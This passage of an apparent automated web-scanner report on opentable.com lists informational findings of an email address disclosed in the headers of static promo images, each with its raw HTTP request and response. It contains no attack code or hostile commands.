User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 2149
Content-Type: image/jpeg
Last-Modified: Wed, 04 May 2011 18:24:20 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:05 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......T.N.."..............................
...[SNIP]...

8.113. http://www.opentable.com/img/startpagepromo/Artisanal-Cocktails.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/Artisanal-Cocktails.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/Artisanal-Cocktails.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 5475
Content-Type: image/jpeg
Last-Modified: Wed, 01 Sep 2010 18:05:18 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:42 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

.........................................................................................................._....
...[SNIP]...

8.114. http://www.opentable.com/img/startpagepromo/Business-Bites-Lunches.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/Business-Bites-Lunches.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/Business-Bites-Lunches.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3401
Content-Type: image/jpeg
Last-Modified: Wed, 01 Sep 2010 18:19:12 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:05 GMT

......JFIF.....d.d......Ducky..............Adobe.d..............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@@?@@@@@@@@@@@@......_....
...[SNIP]...

8.115. http://www.opentable.com/img/startpagepromo/Free-Corkage-BYOB.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/Free-Corkage-BYOB.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/Free-Corkage-BYOB.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3833
Content-Type: image/jpeg
Last-Modified: Wed, 01 Sep 2010 18:07:05 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:30 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

.........................................................................................................._....
...[SNIP]...

8.116. http://www.opentable.com/img/startpagepromo/Great-For-Groups.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/Great-For-Groups.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/Great-For-Groups.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3378
Content-Type: image/jpeg
Last-Modified: Thu, 30 Sep 2010 20:54:22 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:42 GMT

......JFIF.....d.d......Ducky..............Adobe.d..............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@@?@@@@@@@@@@@@......_....
...[SNIP]...

8.117. http://www.opentable.com/img/startpagepromo/Napa-Valley-Start.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/Napa-Valley-Start.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/Napa-Valley-Start.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 3056
Content-Type: image/jpeg
Last-Modified: Thu, 14 Oct 2010 22:57:02 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:30 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

.........................................................................................................._....
...[SNIP]...

8.118. http://www.opentable.com/img/startpagepromo/Outdoor-Dining.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/Outdoor-Dining.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/Outdoor-Dining.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 6570
Content-Type: image/jpeg
Last-Modified: Wed, 01 Sep 2010 18:12:46 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:42 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

.........................................................................................................._....
...[SNIP]...

8.119. http://www.opentable.com/img/startpagepromo/Sunday-Brunch.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/Sunday-Brunch.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/Sunday-Brunch.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 6253
Content-Type: image/jpeg
Last-Modified: Wed, 01 Sep 2010 18:12:38 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:41 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

.........................................................................................................._....
...[SNIP]...

8.120. http://www.opentable.com/img/startpagepromo/blue_moon_ot_138x95.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/blue_moon_ot_138x95.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/blue_moon_ot_138x95.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 7947
Content-Type: image/jpeg
Last-Modified: Wed, 13 Jul 2011 16:26:33 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:34 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

.........................................................................................................._....
...[SNIP]...

8.121. http://www.opentable.com/img/startpagepromo/img_car_1k.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/img_car_1k.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/img_car_1k.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 8144
Content-Type: image/jpeg
Last-Modified: Tue, 28 Sep 2010 03:50:47 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:34 GMT

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................_....
...[SNIP]...

8.122. http://www.opentable.com/img/startpagepromo/michelinguide_138x95.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/michelinguide_138x95.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/michelinguide_138x95.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 5267
Content-Type: image/jpeg
Last-Modified: Wed, 06 Oct 2010 20:49:10 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:41 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

.........................................................................................................._....
...[SNIP]...

8.123. http://www.opentable.com/img/startpagepromo/nationalrw_138x95.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/nationalrw_138x95.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/nationalrw_138x95.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 9955
Content-Type: image/jpeg
Last-Modified: Fri, 17 Dec 2010 23:56:47 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:31 GMT

......JFIF.....d.d......Ducky.......K......Adobe.d...............................................    


   ............................................................................................._....
...[SNIP]...

8.124. http://www.opentable.com/img/startpagepromo/phones_138x95.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/phones_138x95.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/phones_138x95.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 6817
Content-Type: image/jpeg
Last-Modified: Tue, 09 Nov 2010 23:05:04 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:34 GMT

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................_....
...[SNIP]...

8.125. http://www.opentable.com/img/startpagepromo/preposttheatre_138x95.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/preposttheatre_138x95.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/preposttheatre_138x95.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 15963
Content-Type: image/jpeg
Last-Modified: Tue, 21 Sep 2010 21:32:18 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:42 GMT

......JFIF.....d.d......Ducky.......d......Adobe.d................................................................................................................................................._....
...[SNIP]...

8.126. http://www.opentable.com/img/startpagepromo/promo_DC_sm.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/promo_DC_sm.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/promo_DC_sm.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 6377
Content-Type: image/jpeg
Last-Modified: Thu, 30 Sep 2010 18:08:22 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:41 GMT

......JFIF.....d.d......Ducky.......K......Adobe.d...............................................    


   ............................................................................................._....
...[SNIP]...

8.127. http://www.opentable.com/img/startpagepromo/spotlight_135x95.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/startpagepromo/spotlight_135x95.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/startpagepromo/spotlight_135x95.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 10641
Content-Type: image/jpeg
Last-Modified: Sat, 18 Dec 2010 00:54:58 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:33 GMT

......Exif..II*.................Ducky.......P.....ohttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...

8.128. http://www.opentable.com/img/stg/ResultsProcessingAnimationNew.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/stg/ResultsProcessingAnimationNew.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/stg/ResultsProcessingAnimationNew.gif HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 14086
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:10 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:53 GMT

GIF89aC.................................................................................................................................................................................................
...[SNIP]...

8.129. http://www.opentable.com/img/stg/progress_text_reg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/stg/progress_text_reg.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/stg/progress_text_reg.gif HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1594
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:09:10 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:44 GMT

GIF89a5.4....................wl.ZQ.<6..........33.DD.UU.ff.ww................................................!.......,....5.4.....%.di.h..Ca..A.tm.x..|....p48$.H.l.lZ
..t*5.....
+8.....,#....hn..>2..c
...[SNIP]...

8.130. http://www.opentable.com/img/stg/progressn1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/stg/progressn1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /img/stg/progressn1.gif HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
